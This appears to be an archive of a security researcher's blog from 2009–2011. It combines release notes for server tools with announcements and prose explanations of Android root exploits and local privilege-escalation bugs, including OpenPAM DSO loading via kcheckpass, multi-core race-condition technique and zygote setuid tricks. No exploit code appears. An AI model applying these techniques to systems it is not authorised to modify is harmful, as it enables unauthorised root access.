C-skills

sshttp is in the git

2011-12-15T07:32:00.000-08:00

A few days ago, I put the sshttp project to the github.

It allows to run SSH and HTTP(S) on the same port

without changing them.

I also checked in new code for lophttpd, to support

IPv6 and bind's to specific addresses other than

INADDR_ANY.

The benchmarks I did were really satisfying, it outperforms

default apache2 installs (surprise, surprise) and also

ngnix. Hope to get some time to plot some statistics

about that.

All your servers are belong to us

2011-12-08T03:15:00.000-08:00

We deliver. Worldwide. Up to 0x743c times. And if you
are still not there, we return to libc.

You just noticed it, there is a new front pic online. I'll rotate
this within the next months to show cool and the gang
in different positions inside the cloud. The experienced
reader also noticed that the shirts are all made of valid
RPM switches and indeed the most important ones.

While I myself will definitely keep up with mobile stuff, our
origin are servers and the code running there. We deliver
stable, fast and secure services. If you have any problems
with your server or code, just call us.

me hubbing and gitting on github

2011-11-29T06:48:00.000-08:00

As of today you can also find me on github.
I am testing how good or bad it performs for my own projects.
For now, I made lophttpd a public repo where you can
watch the development process.
My openwall site and other places where I used to put code
stay the same and I will continue to upload .tgz files.

Censorship

2011-11-25T06:23:00.000-08:00

In this' blog survey "Do you like surveys?", too many people voted that I am an idiot, rather than they dislike surveys (less amount
than people who like surveys though) so I do it like middle east
dictatorship: I just cancel it :P

openpam trickery

2011-11-08T07:51:00.000-08:00

While reviewing an entirely different server side component
of some code, I came across a funny vulnerability inside
OpenPAM (note that this is different from Linux-PAM)
as used in FreeBSD or Solaris. Yet, I only tested it on
a FreeBSD 8.1 machine. The bug is that a program,
namely kcheckpass, which is suid to root, is calling
pam_start() with a user provided argument which makes
the PAM stack parse user owned
config files which ends in loading of user
provided DSO's. WTF?!

Interestingly, OpenPAM recently introduced a filter for
the service name via

http://trac.des.no/openpam/changeset/478/trunk/lib/openpam_configure.c

commit but I dont think that any BSD or so vendor is
aware of it.

A really trivial PoC exploit can be found here.

[Update:] Solaris is not using OpenPAM (at least the OpenSolaris
version I checked), but I could not find code that strips
off certain character sequences. As the PAM setup is different
from the /etc/pam.d we know it is possible that there are no
consequences if the service argument is not filtered.
However a lot of BSD derivates
use OpenPAM and OSX as well. The question is whether one can
find a vector different than the kcheckpass which is usually
found with all KDE3 and KDE4 installs.
If you can confirm vulnerability on any Solaris or non-FreeBSD
machine, please let me know. Also if you found out how OSX
can be exploited this way.

Fun with git-upload-pack

2011-11-03T04:15:00.000-07:00

The android git was recently moved so I was eager to check
out the new sources. But I always got a 403! What was wrong?
Looking into some forums showed that lots of folks seems to
have the same problems so I post this in the hope that it
saves other developers some hours of debugging. At the end it seems
just to be an issue about the git version or git setup.
I cloned a repo with a clean, new machine and compared the
HTTP stream with what I got from a working box to find
out why some checkouts worked and some dont. Heres is the
old git pull:

and here is the new one with the diff marked green:

Somewhat surprising since according to the download page
git 1.6.4 should just be fine.
Now everything works smoothly. Not a very technical issue indeed,
but tracking down strange issues helps to stay keen. More than
just searching the web for a solution.

AIO

2011-10-07T04:21:00.000-07:00

I just uploaded my version of the AIO functions for Linux 2.6.
They use kernels io_ syscalls rather than doing everything with pthreads (like last time I checked with glibc).
It is available here.

New sshttp available

2011-08-19T07:02:00.000-07:00

I uploaded a new sshttp tarball to fix potential slowdown
for a special usage pattern where thousands of clients
without sending data upon connect would slow down
other users connections.

refactored IPv6 load balancing software

2011-08-05T05:44:00.000-07:00

In 2003 I attended a class at University about IPv6.
Students have had to choose a topic to work about and I
chose to write a load balancing software for IPv6
utilizing the netfilter QUEUE target. It was one of the first
available load balancers for IPv6 ever, long before the
LVS project implemented IPv6.

It has since then been shown on a lot of conferences and follow-up

classes.

Since the old code was not the most performing one (even though
bandwidth and latency tests showed acceptable results) and
the underlying netfilter changes made it useless on new
Linux systems, I re-wrote it. It is now better performing,
is able to use multiple cores/SMP and runs as user.
Additionally the failover code for IPv4 has been improved
(it is able to balance IPv4 traffic too).

You can argue that, since it runs in userspace, it will
always perform badly. However if you have a site for testing
with enough traffic, I'd like to see results.

If I'd be a professor at University, I would just let one
of my students write a thesis about its performance and let
him do some measuring, but I am not. :)
My performance test on a 100MBit link showed no real impact
on either throughput or latency. GBit performance measuring
has to be done. Anyone?

The code with a guiding README can be found here.

In any case it sharpened my skills about IPv6 and its sisters
and that alone was really worth re-mangling the code.
Great tools are about to be born (Hi Marc:)

pwnies 2011

2011-08-05T02:12:00.000-07:00

As you might know or not, me and Marius have been nominated for the pwnie awards 2011 in the category best server side bug.
The CVE-2011-0997 DHCP bug was really funny and easy to exploit and often found in enterprise and campus network setups.
Unfortunally we didnt win, and to my surprise even taviso didnt win this time.
So I am likely the only one who has just one pwnie while all
the real good guys have at least two!

Nevertheless, congrats to the winners. In particular I like
pipacs' Lifetime Achievement award and $0ny's mastering in failure.
They both really deserve it.

Do nation, don't nation?!

2011-07-15T02:15:00.000-07:00

Due to weird offerings, I need to write some words about donations.
The basic rule is: Either do it or don't. If you don't feel
to support jailbreaking or cant afford it, its OK. Really.

However its not like I need to do you a service
where in return you offer me your 2 bucks. What do you think
one hour of development is worth?
If you dont like the software or it is not working for you, just delete it.
If you need a consultant/developer/reverse engineer, get one.
I hope you can afford it. :)

P.S.: Do not forget to vote.

crash

2011-07-07T07:15:00.000-07:00

I uploaded a new version of crash, fixing API issues
it had with newer OpenSSL versions which silently
changed some SSL_METHOD* returns to const. Huhhh!

The lock sock

2011-06-23T01:50:00.000-07:00

While developing a piece of code which requires locking
across processes (not threads) and which runs as nobody
user inside a non-writable chroot I came across the idea
to use abstract UNIX sockets for locking.
The advantage is that it is very easy to implement and use
and you dont need to create a file as you would when using
file based locking. You also dont need to mess with the
SVR4 IPC mechanisms and its portable as well. The idea is as
easy as beautiful so I think I am probably not the first
one abusing UNIX sockets that way. The code is here:

Basically you delegate the atomic lock operation to the
kernel via the bind() syscall since no more than one
process can bind to a given path at the same time. Since
there is no unbind() operation you have to close() the
socket in order to free the lock.

Closing recent thread

2011-05-26T02:26:00.000-07:00

I will close the GingerBreak post now since most comments
are meanwhile about particular versions or not related to
Android OS at all. It turned out that GingerBreak works
on Froyo, Gingerbread and Honeycomb. For some versions it
needs minor fixes like in the detecting-phase but overall
it is a good and stable softbreak. Thanks to those who
sent patches or test reports.
Smartphone security and Android security in particular seems
to be the new hype (WTF?! HTTP is sending data in
plaintext!?) and therefore it is about time to
fall back to monitor-only mode. If you ever see a # on an
Android device in future, always remember who was pioneer-ing
exploit development on that platform and remember where
all these spin-offs came from.

I have had the choice of writing scientific papers about security
and exploits, or to code exploits. And I chose the latter.

yummy yummy, GingerBreak!

2011-04-21T02:11:00.000-07:00

Free your phone, once again. Successfully tested on Gingerbread
(2.3.3) but might also run on Froyo and Honeycomb. If it fails
there, some offsets and indexes need to be adjusted which is
left to the reader.
NOTE: You use it at your own risk! I am not responsible for any
failure or damage. Make sure to read the README file carefully!
Download it here.
If you successfully run it anywhere, please make a comment
with exact device model/firmware running.

[Update] I replaced the tarball with a new version to fix
some glitches while parsing vold.fstab. Should now also
work on the GalaxyS. Thx to Chainfire.

Evolution of race condition exploits (CVE-2011-0727 trickery)

2011-04-01T08:48:00.000-07:00

I recently did a PoC for CVE-2011-0727. It was possible
to have a one shot exploit for a race condition which
is just a few (2 or 3 or so) syscalls in range.
I compared it with an old exploit I did in 2002
for OpenBSD/FreeBSD against pppd. I uploaded it for
historical reasons so you can see the evolution of
race condition exploits.

In userland almost all race
conditions (time of check - time of use: TOCTOU-exploits)
cook down to races in the filesystem. While in kernel
you also have other shared resources like pages in userland
or counters.

The situation around 2000 or before was that most systems only
have had one core (single CPU) and therefore there was
no real concurrency. The scheduler had to interrupt the
target process just in the right time and have the
exploit process chosen to run afterwards.
How did one achieve that in 2000? Slow down the box
with many processes which a) increases the overall chance
that the target process is put asleap inside the race
(nice(2) calls also help if applicable)
and b) having many exploitation processes increases chances
of an exploitation process to be picked up next.
As can be seen in pppdx.pl ,one process was always
switching between a real file and a symlink and another
was constantly forking of a lot of pppd processes.
Sometimes, this needed a bit of tuning, depending on how
fast the target machine was. But eventually after a few
minutes it used to succeed.

Years after that a new framework was introduced on Linux
where one could register notification hooks which were
called when a certain event happened (e.g. creating the
target file). In early times you needed to register a signal
handler which was delivered and nowadays there is
the inotify framework which allows to register hooks for
almost all use-cases. I used inotify in the KDM exploit.
It saves the exploit coder from creating a lot of
processes which constantly poll for an event because
reading from the event descriptor just returns when the
event happened. On single CPU systems one might still need
to fork a lot of processes since the scheduler must put the
target process to sleep at the right time nevertheless.

Now we have 2011, and writing race condition exploits
for file races has never been easier. Even the
cheapest mom-and-dad PC has got at least 2 cores, probably
more. Therefore we have true concurrency since we can
make the target process run on a different CPU-core than
the exploitation process. Therefore we no longer rely
on scheduler to interrupt the target at the right time.
We can just poll or sleep on an event with a single process
and are still fast enough with changing the target file.
One just has to ensure that (if more than 2 cores exist)
multiple exploitation processes do not interfer
with each other if the event happens.
The CVE-2011-0727 GDM PoC is doing exactly that.
With the KDM exploit it basically worked the same
(best on multi-core CPU systems) but with using
the inotify framework.

Testing and stuff

2011-03-28T23:29:00.000-07:00

Gingerbreak is not that easy and needs to be carefully tested.
Additionally, I wait for a particular device to be
released. I am not waiting for the fun of it.
But as always, no guarantee for anything.

I am not the unrevoked or XDA support

2011-03-17T12:42:00.000-07:00

I constantly receive comments/questions regarding problems/ideas
about work done by unrevoked or the XDA forum.

If you have any Q's about these recovery/S-OFF/NAND/exploit-GUI
or whatever please visit their websites. I cannot
help you with it as I am not involved in their software
or FAQs. I am sure they are looking forward to hear
your opinion/questions.

If there is any particular Q about *my* software, of course
feel free to comment.

Zimperlich sources

2011-02-24T03:35:00.000-08:00

Since there were some requests I made the source of
the zygote jailbreak, zimperlich, available here.

Its straight forward code just like the adb setuid() one.
Most of the time I spent getting the Makefile right and
tricking zygote to spawn the right amount of processes and
calling setuid() once more when we are already running.
Keeping in mind that I dont like Java.

I solved this with a ContentProvider and giving it a new
process name in AndroidManifest.xml, so the ContentProvider
is guaranteed to be invoked as a new process.
If the NPROC limit is reached this will be the root
process.

Also, we want some native code carried along with the .apk
for convenient purposes. The Android ABI requires that
it must be named libNAME.so but in fact it is of
type ET_EXEC and not ET_DYN so we can execute it as
binary.

If you look at the Makefile you can imagine that this
was a horror. You require a complete Android build in
$AROOT to succeed.

Of course you could also mis-use the RageAgainstTheCage
binary to exploit zygote (and not adb) if called from
an .apk like the z4root did. But I think nobody noticed
or cared that a different setuid() bug was actually exploited.
Thats at least what my short analysis showed. If I am wrong
I will remove this paragraph. So, only use the original
old but gold code on the commandline as proposed
to get the real deal! :)

Cloud Clock trickery

2011-02-18T04:58:00.000-08:00

I spent some time fumbling with HTTP again but not related
to Web 2.O. Rather I was interested in how HTTP could
replace NTP since web servers reply with a Date: string
upon each request. The result can be found here.
It is basically a daemon that fetches Date: of
pre-configured servers and tries to minimize RTT and
local I/O impact when setting the time. It also runs as
a user chrooted, keeping CAP_SYS_TIME.
It should also work with IPv6 nodes. If you want to use
my lophttpd web server along with httpdated, you need
to update it to the latest version.

Feel free to comment if you have ideas or see problems
but do not bother me with "NTP is much more better and
more correct". I know that :-)

ELF process dumping trickery

2011-02-02T00:27:00.000-08:00

I made a small tool available here which allows to
dump ELF binaries from memory to disk in cases
where the original image has been altered/deleted/crypted
etc.
There is no way to make it 100% reliable as the state
of the program might not be the same as when just loaded
and therefore you can have dangling pointers etc.
in .data. However it works surprisingly well for a lot
of programs.
Some info is lost during loading anyway and has to be
restored heuristically. We rely on linear ascending
PLT jump-slots for example.

I only tested it on x86-64 but it has basic support
for x86 as well. The de-relocation of the image has
to be checked though. All other architectures like
PPC64 etc. can easily be added by adding appropriate
R_ types to the switch() clause.

Happy birthday to a good friend. You are not 25, you are almost 31 :-)

2011-01-21T03:07:00.000-08:00

According to some news site its the 25th birthday of
the computer virus. Or not.

While most of the scientists and malware analysts know
that Fred Cohen did one of the first virus research in 1984,
it is a little known fact that in February 1980 a Diploma Thesis
at the University of Dortmund already discussed self replicating programs (in german). The 80's must have been such a great time. :-)
If you are interested, I also discussed some virus related issues
for UNIX in 2009 here.

adb trickery #2

2011-01-06T09:51:00.000-08:00

Apparently some vendors have reviewed android and also fixed
the ashmem issue in 2.2.1 (along with adb and zygote).

However, I got the first reports for KillingInTheNameOf
working on 2.1 devices. So I made it available
here.

It was really my favorite and I hoped it would become
the Gingerbreak, but 2.3 is not using
ashmem for system properties. Thats life :)

[Update:] it seems like the property space has become
the new playground for breaking froyo devices since this post,
as the ashmem implementation has some shortcomings if
it comes to properly protecting the property space :-)
The security of the whole system relies on the property
space due to ro.secure and other properties.
However for Gingerbread, the property implementation has been
redesigned AFAIK.

Also check out this link for another method of exploiting
ashmem which apparently also works on 2.2.1 devices.

My Gingerbreak works, but I wont release it before a couple
of devices are in the wild so the issue is not fixed before
it can become useful.

Zygote trickery -- 743C 27C3 release

2010-12-30T04:24:00.000-08:00

The Gingerbread source has recently been released and
a root vulnerability has been fixed inside the
zygote/dalvik framework (if you dont know what it is,
call it a framework). I hoped that this exploit would
still work on Gingerbread, but since the bug is too
similar to the adb issue it has been fixed as well.
Thus, this only affects android phones < 2.3 but
it also works without debugging being enabled e.g.
from inside an evil app.

As always: the code is AS IS.
If you use it, it may crash your
device and makes it totally useless, SO YOU USE IT AT YOUR OWN RISK! THERE IS NO GUARANTEE
THAT IT WILL WORK AT ALL.

If you dont know what jailbreaking is about, dont do it anyways.
Once executed it should create a /system/bin/rootshell or
+s /system/bin/sh.

The apk can be found here. Nevermind the simple GUI,
it was pasted together from various sample/demo programs
just to make it easier to have an activity to start
for zygote.

And fear my publishing skillz! :D

The bootdisk and the rootdisk

2010-12-16T09:05:00.000-08:00

The recent discussion at the pub was of course about
the bits and bytes but this time with view on historical
facts. Someone remembers the bootdisk and the rootdisk?
When it was not possible to boot from CD-ROM it was
necessary to dd a bootdisk and a rootdisk image to floppy
disks. After a few installs, one of them was always fscked.
So why were we using Linux at all? Wasn't it a funny time
with TurboPascal at school? Or even better with BorlandC++
which I got hands on in '94 or so on a low-price
(b/c outdated-)version. For a price of just 80 DM
which was still high enough at that time one also got the incredible TurboDebugger and there the fun starts.

While I am not going to explain for what reason exactly
TurboDebugger was cool (I know the even more cool guys
used SoftIce :) it showed you the hard way why
RealMode really sucked in particular if there is a ProtectedMode
since years. So isnt there any good OS utilizing that?
Whats this "Linux" ...?

Gingerbread

2010-12-06T23:37:00.000-08:00

If someone already has got a Gingerbread and wants to

save the world, let me know.

Happy Birthday to .no

2010-11-15T00:15:00.000-08:00

Special greetings and congratulations to Uschluh today
where the one and only root is celebrating his BD.
May be the force with you to withstand all evil of life
in whatever shape it will appear: users, bosses, women,
burning switches or Fedora 14.
You've got the power. Looking forward to a new Gewaltmarsch. :)

New sshttp feature trickery

2010-11-01T10:01:00.000-07:00

sshttp is now able to hide SSH inside HTTPS as well.
SSH behind HTTP was possible before, and so was HTTPS,
but now it is "official" :)
You cannot mix HTTP and HTTPS in the same instance,
but you can run multiple sshttpd's.
I also added multicore support (basically the same
as for lophttpd, see earlier postings) AND support
for Linux capabilities. It runs as nobody in a chroot now
and only keeps CAP_NET_ADMIN and CAP_NET_BIND_SERVICE.

Multicore support for lophttpd

2010-10-30T07:51:00.000-07:00

lophttpd (in version 0.86), which is my private research
project for high performance web servers, now comes
with support for multiple cores (Linux only for now).
Unless specified otherwise, one thread per CPU core sleeps
in a accept() loop. Increasing load of the cores will then
result in more and more connections passed to the accept()
sleeping on yet unused cores.
This works since the kernel wakeup's all threads sleeping
in the accept() but only one will actually get the
connection (all others get EAGAIN).
In OS engineering this is known as the thundering herd problem
if you have thousands of processes woken up at once.
However this does not apply here since the number of cores
is small compared to what would "thunder a herd".
So basically we take the good parts of that "problem" but do not
run into the problem itself.

If it turns out to work well, I will also add multicore
support to sshttp. And it is by far more fun to code it
than the OS classes at university discovering scheduling theoretically.

Death of a great mathematican

2010-10-16T09:30:00.000-07:00

I just read that the great Mathematican Benoît Mandelbrot
died on Oct 14th.
His Mandelbrot-set fractales were one reason for me to start programming back in the days. Beside its beauty its likely
that all your mobile internet wont work without fractales
since (almost all?) antennas inside small wifi/GSM/UMTS
are self-similar to have maximum gain/space ratio. A lot of other technical and scientific
equipment would be NULL without that too, and I bet the
distribution signature of self replicating code also has to
be self-similar if it wants to be optimal. :-)

New sshttp available

2010-10-11T09:45:00.001-07:00

I switched the I/O engine inside sshttpd from blocking to
non-blocking sockets. Blocking I/O is by far easier,
but disappearing IPs could hang all other connections.
This should be fixed now.
Non-blocking socket state engines are really worth
a PhD thesis. :-)
Anything else is as before, just setup nf-setup
and run sshttpd.
Available for download here.

Hiding a sshd inside a httpd trickery

2010-10-08T06:56:00.000-07:00

If you always asked yourself how you could run both a sshd and
an apache (or a lophttpd!) on the same TCP port 80
without patching any client or server software and still
getting always the right service, you should
have a look at sshttp.

743C mails

2010-09-18T10:03:00.000-07:00

Every now and then I check my 7-4-3-C mailbox and I was quite surprised that in the days
quite a lot of mails arrived. Please dont take it as arrogance if I am not answering, unless there are specific questions regarding
license or such.
The amount of mail is just too much and most of them do not
contain really urgent/important questions.
So please accept this post as a reply. Thanks for
the mails and the offers you made.
Continuing 743C does not depend on the amount of donations
(which has been asked for) since it was not meant to
be a commercial success-project. Nevertheless thanks to the people who did a donation.
To those familar with 4-digit hex numbers, I had to name it
743C for a certain reason. I am not dead, I am just focusing
on different projects to stay sharp. :-)

updated crypto tools available

2010-09-10T08:01:00.000-07:00

I submitted new versions of crash and psc mainly
to honor even more strict GCC behavior.
A lot of my own tools dont build anymore because of some
tricky type conversion which I always thought would be
plain ANSI. Well.
It seems to me that type conversion is not a possible
thing anymore today.
GCC folks told me to use memcpy() instead of *(int *)&buf[0] = 0x73;
Time to fix.

Please hold the line!

2010-08-28T04:18:00.000-07:00

Sure. I always did!
If you are on top, you should stop. The 743C project is past.

There is not much we can achieve from now on anyways. More
or less all the robots are belong to us. There is not much chance
that a device or brand cannot be owned with any of
the 743C exploits recently published. Even devices which
are not yet available on the market (epic) can be
rooted with these (src now included). If there are any
devices where the exploit doesnt work -- just let them live.

Personally, I will return to server&network security again
as well as HPC/HA. There will be no more 743C exploits in future.
Every now and then, I will have a look at android, since
- after all - it is a nice OS and there are a lot of things
I am eager to learn from it.

The 743C project was a short, but funny one. I want to thank
all the people involved with it; who discussed issues with
me as well as the folks who wrote all the tutorials and
hints or sent feedback.Thanks to the six people who
were actually PayPaling me :-)

Last but not least, I am very proud that 743C was hosted
by the Openwall Project.
They provided us with stable, secure and reliable hosting.
Without reliable hosting, everything is nothing.

Droid2

2010-08-21T04:54:00.000-07:00

A beta version of a new softbreak is available here.
If it works out it is made publically available.
The l/p is beta/beta.

[Update:]
It has been confirmed that the exploit is working on the
backflip and evo too. Thats not surprising,I always
said it will work on the backflip :D
I just wonder what all these timing discussions are about.
The exploit is doing everything alone by itself,
you do not need to "exit" or kill the adb session.
Just execute it and wait until connection is reset by
exploit. Then adb kill-server; adb shell -> #
Thats not too complicated.

Jailbreaking legalized in terms of Y^HDMCA

2010-07-27T23:53:00.000-07:00

Apparently the EFF was able to relax some conditions of the DMCA.
Thanks to them it is now legal to jailbreak your phone.
Thats great news! :) Of course that only expresses what
sounds like human digital rights anyway: to own what you own.
As a nice coincidence I was meeting some of them two weeks ago
at a developers conference.

Small side-notice: 743C is still accepting device-donations.
If you have an android >= 2.0 device (preferably newer ones
like DroidX, Milestone, Backflip, Hero, Desire etc.)
that you dont need anymore
please leave me a comment with your contact address.
I dont need the GSM part (e.g. no SIM). I run most of
the stuff inside emulator, but certain things need
a real device as seen with /etc/firmware
or the additional software that is installed by the
vendor/carrier.
It would help to develop jailbreaks in future.

Some people uploaded videos of jailbreaks, using 734C
exploits like this or that.

exploid works on the Droid X

2010-07-23T01:35:00.000-07:00

It has been reported that apperently someone was
able to compile and run the exploid on the oh
so unbreakable Droid X.
There seem to be devices with missing /etc/firmware which
is needed as an exploit vector. However there are other
possibilities to exploit this init-bug. But its not the
scope of 743C to provide working versions for every device.
Please note that this is a non-commercial spare-time project
and I even do not own any device for testing.

If the firmware subsystem doesnt work (it requires /etc/firmware
so an additional path traversal bug can be exploited too),
one may also try the usb, graphics, block, char, sound or mtd
subsystem to create mode 0666 devices or to exploit
a race condition during the device-creat
to chown /dev/mtd. It should be
possible, however I dont have time to do so :)

android trickery

2010-07-15T05:27:00.000-07:00

Free your phone.

Fixing large file truncation in lophttpd

2010-06-26T09:08:00.000-07:00

I dont want this to become a webserver blog, but I just fixed
a bug which lead to truncation of large files (e.g. >1Gig)
while downloading. Stupid bug by using %d rather than %zu.
Its available at the usual location (version 0.85).

Thanks to the one and only Nico for reporting. Your mad
scientists can now continue to download the star collision avi's.

New lophttpd version supports faster logging

2010-06-24T06:39:00.000-07:00

As announced in my previous post; the new lophttpd
package supports mmap and aio based logging now,
if enabled via -L mmap or -L aio .

Looking for lophttpd testbeds

2010-06-08T06:18:00.000-07:00

I am looking for heavy loaded sites which serve static
content (e.g. banners, pictures, iso's etc.) to test
my http server software and to help it to improve.
I added some experimental features recently
which will be released soon and mainly consit of
various log providers to overcome possible bottlenecks
during logging.
If you have thousands requests/sec, writing out logs
can become an issue and I added support for AIO and
mmaped-backed buffers.

If you are interested, drop me an email or a comment.I am
BTW also looking for donations of mobile devices
to continue my Android and WebOS research. :)

New lophttpd packges fixes some issues

2010-05-30T06:33:00.000-07:00

I just published version 0.81 of lophttpd
to fix potential access of not mapped memory areas
if large directories are autoindexed. Some other things
has been fixed too (see Changelog).

Thanks to Alexander Hagenah for reporting the autoindex
issue.If you experiance any bugs or performance drops
or alike, please let me know.

CONFIG_UNIX_MONITOR=y

2010-05-26T05:51:00.000-07:00

I digged into the depth of network packet handling, softirq's
and packet queues and hacked down a patch for the
2.6.34 kernel so that PF_PACKET can be applied to
PF_UNIX sockets.
The goal is to have a unix interface one day which you
can pass to pcap_create() and wireshark or tcpdump.
With a e.g. DBUS dissector you can then monitor
the application level IPC to find the more unknown
bugs :-)
The hard part now is to get this patch upstream,
so that it is available on a standard Linux distro
the same way you'd monitor your network traffic.

Small fix for lophttpd

2010-04-21T09:10:00.000-07:00

I uploaded a new version of lophttpd since it was
not properly decoding URL escapes (%2B etc). Not
a security issue, but it was just ignoring escapes
completely %-D
Since the download stats for lophttpd are quite
impressive, I quickly added it. I already found the first
lophttpd banners in the wild. :)

The amount of download is of course not as impressive
as for devshit. I think most people don't realize that
this is not an exploit that pops you up a rootshell.Instead
it sets up a portable HDD which, upon plugin into a vulnerable
DeviceKit installation, creates a rootshell on the system.
IOW you need console access.

CVE-2010-0436 PoC

2010-04-18T09:06:00.000-07:00

The fixes for the CVE-2010-0436 have been released last week,
so comes the PoC. I wonder nobody has already done it yet,
as its an easier one. Its a classic symlink attack in KDM
with an additional "trick" that requires to keep the
directory where the vulnerability happens has to be/made
owned by the user in order to work.
The vulnerabilities in-depth description is here.

Released simple&fast webserver

2010-04-13T07:30:00.000-07:00

I just released the lonely and poor httpd. Its not
RFC full-featured but was written as a study for
a single-threaded, high-speed HTTP server which
can handle tens of thousands connections simultaneously.
It delivers static content, supports vhosts and autoindexing
on the fly. It doesnt need any config-file and runs
as nobody in a chroot for maximum security :)
It avoids unnecessary userland/kernelland/socket-buffer copies
by using sendfile(2).
I tested it on Linux and FreeBSD. As long as your OS supports
sendfile(2), it should be easily portable.

Playing with URL shortening

2010-03-12T06:19:00.000-08:00

URLs cannot only be shortened. They also can be expanded.
Since a lot of pople are using URL shortening services,
it was funny to reverse some randomly generated URLs.
Basically, you find peoples browser history including
session ID's etc. Not a big deal, but I think it could
be used to build some surf statistics and other nice
info gathering.
The script can be found here
Please be carefull not to hammer the servers; thats
actually why a sleep() was intriduced!

New injectso -- Debian proof

2010-02-18T03:33:00.000-08:00

The new injectso comes with a new technique to find the
address of the needed rtld function. Some systems (Debian based)
make /proc/pid/maps unavailable by default which
former injectso needed to work properly.
It now also works via /proc/pid/auxv to read AT_BASE
and to calculate where rtld functions can be found.
The nm method is also still included for systems where
libc exports symbol names.
The /proc/pid/auxv method has only been tested on x86_64
but should work on x86 too.

Additionally, I am officially sorry for the coding style
of injectso before v0.51. All the exploit coding makes a
terrible style and I will drop that for a while.
The code has been cleaned up and is now readable and
something to learn from.

Runtime hot-patching processes w/o ptrace

2010-02-05T07:04:00.000-08:00

I am a fan of achieving the same result with multiple, different,
solutions/implementations. In computer science (and security
in particular) this leads to real benefit and cutting edge
because if you have more ways to do it, you are not limited
or bound to techniques that may change, evolve or are
hardened/dropped completely. One such example is the injectso
I recently published. It uses ptrace(), but if you think
removing ptrace() from the kernel is a plus, have a look
at lasso. It does the same thing without using ptrace().

There is more than one way to Milano. 8-)

Thoughts on companion worms

2009-12-23T06:40:00.000-08:00

I wrote a paper almost a year ago now and since it has been
reviewed by a lot of skilled people including, but not limited
to, anti virus researchers, its time to make it public.

Its about a special kind of worm and vulnerabilities
which are commonly under-hyped like CVE-2008-2383 which
most people would probably only recognize as local, if at all.

You can find the paper here.

Enjoy reading it, if you feel that X-mess is coming :)
This is most likely the last posting for this year, so
I wish you merry X-mas and happy new year. You can find me
at the 26C3 in Berlin this year, if everything goes straight.

Always check return value!

2009-11-30T23:47:00.000-08:00

A nice bug inside the FreeBSD runtime linker has been
reported here.

It was good that I hashed my previous exploit
(discovered it some months ago) in my twitter message
from November 5th:

md5 4b1717926ed0d4823622011625fb1824 sha1 6871fd05efbddf7eea4447f7bfdc1c9a45979fe3

Since a public exploit is now available anyway,

I also make my version public and you can check the

hashes

here 

to prove it.

I have a strange feeling that this re-discovery comes now,
since I talked to some people regarding BSD bugs lately.
Nevertheless I know kingcope is a skilled reviewer and
it was not the first time he had BSD as a target.

Adventures in Heap Cloning

2009-11-15T00:58:00.000-08:00

Heap seems to be a magic word. I never got download rates
like this for a paper. Since there was no feedback that
told me that I am completely wrong, I make it
available to a broader public now. A small chapter has been
added: 'Countermeasures'.
The paper is available here.
You probably know that I am not a memory-guy, so do not
expect much more research in this area by me.
I rather really enjoy developing code that hashes
like this:
sha1: c60a0e1daff22c0d97eb03f509c7135d119d830b
md5: fcb19f8317449ad9f93a12fccb63c650.

xorl blog seems to be up again

2009-11-02T02:23:00.000-08:00

A few weeks/months ago I sadly realized that the author
of the xorl blog was quitting his writeups. Now it seems
that he is continuing his activities. Now I have
something nice to read at the beginning of the day.
Although he doesn't speak about vulnerabilities he found
himself, its one of the better security blogs in my opinion.
I really enjoy reading it and like to recommend it to
everyone interested in software trickery.
I want more OpenBSD foo. :)

injectso 32bit x86 port

2009-10-16T07:35:00.000-07:00

injectso now supports x86 and x86-64 architecture. make automagically

compiles the correct version.I also added some code cleanups and

error checking as well as the possibility to inject DSO's with relative

pathnames as suggested by a patch I received.

Do not forget to vote (right toolbar:) !

New injectso available

2009-10-14T08:43:00.000-07:00

I ported injectso to the new glibc (2.5, 2.9 and 2.10 tested).
It now runs on Linux/x86-64 machines. Original developed
by Shaun Clowes in 2001 for i386 and sparc it showed that
there is a really simple way on current systems to do that.

unixdump UNIX-socket sniffer available

2009-09-30T02:44:00.000-07:00

Update:
Released new version (0.42) since 0.41 (not avail anymore)
crashes when accessing udmp device afer rmmod.
(The dynamically assigned major number was not updated
for unregistering.) Thanks to myself for reviewing my own
code :)

Ok, its finally avail here.

Do not run it inside an xterm or otherwise its
like sniffing all tcp traffic remotely on a ssh shell.
BTW ssh. Due to my ssh timing/packet-size patch
I've been called a Iran circumvention developer.

Really funny wording. I like to add that to my
resume.
And right in time while typing
they play LOA with Love to let you down.
What do you want more?

When const really means const

2009-09-29T09:02:00.000-07:00

Who cares about const? Its never enforced anyways!?

Except in Linux kernels built with gcc 4.x (maybe even
before?). If you declare a pointer member const
(the thing it points to, not the pointer itself), like
proto_ops in the socket struct, the pointee will be placed in a
RO location which means you cant redirect socket operation
functions like recvmsg(). You have to make the right PTE
writable in order to redirect the functions.
Rootk^H^H^H^H^HCertain debugging LKMs like my unixdump
require to redirect some functions in order to record
whats sent across sockets. unixdump works like tcpdump
for inet sockets. The version which is available now was
written in 2006 for the 2.6.16 kernel and doesnt work with
recent/current ones (and its dirty and hackish anyways).
Thats why I ported it within the last days to current kernels.
It will be uploaded soon.
The way you can modify const members changed in current kernels;
in fact is is easier than before b/c a new function lookup_address()
is exported and you do not need to walk the PGD down.

GCC -fmudflap

2009-09-22T04:24:00.000-07:00

Programs compiled with -fmudflap are given protection by GCC
against overflow conditions etc. The GCC then adds a runtime
to track&check operations on arrays etc..
To specify runtime behavior, you can pass various
options via the $MUDFLAP_OPTIONS environment variable.
If we look how the mudflap runtime is
handling these options, we have:

...
case viol_gdb:

snprintf (buf, 128, "gdb --pid=%u", (unsigned) getpid ());
system (buf);
...

Note, that mudflap is made for security reasons. For programs
like network servers or setuid binaries.
I made a bugzilla entry into the GCC bugzilla since this
should be changed somehow :)

Small improvement for inotify

2009-09-21T23:25:00.000-07:00

The inotify tool got a small improvement yesterday, so you
can pass -r (recursion) to it. It now also allows you to recursively
watch newly created/modified/deleted/accessed files/dirs
in newly created subdirs of the watched directory.
This already showed me some differences between man versions :)

un-evil code

2009-09-14T01:53:00.000-07:00

I had incredible dl statistics for gc.cc (see last posting). Even
better than for exploits, years ago when I was publishing them.
Seems to me I should switch completely to write robust and boring
application code which is much more appreciated by the public.

Nevertheless, since there have not been reports about
crash containing major bugs or alike, I removed the beta-test
password from the directory.

C++ local_scope<> template

2009-09-04T06:53:00.000-07:00

If you write a lot of code (and I know, some of the readers
actually do :), depending on your style, you often run
into situations where you allocate some ressource like
fopen()ing some files or allocing memory and later
you realize some error-condition and you properly need
to fclose()/free() all the stuff in the right order
and depending on what was allocated yet.
This leads to a lot of copy-n-paste code and often
plain wrong code or even better security breaches :)

If you like C++, you can have a look here to avoid
all these problems.

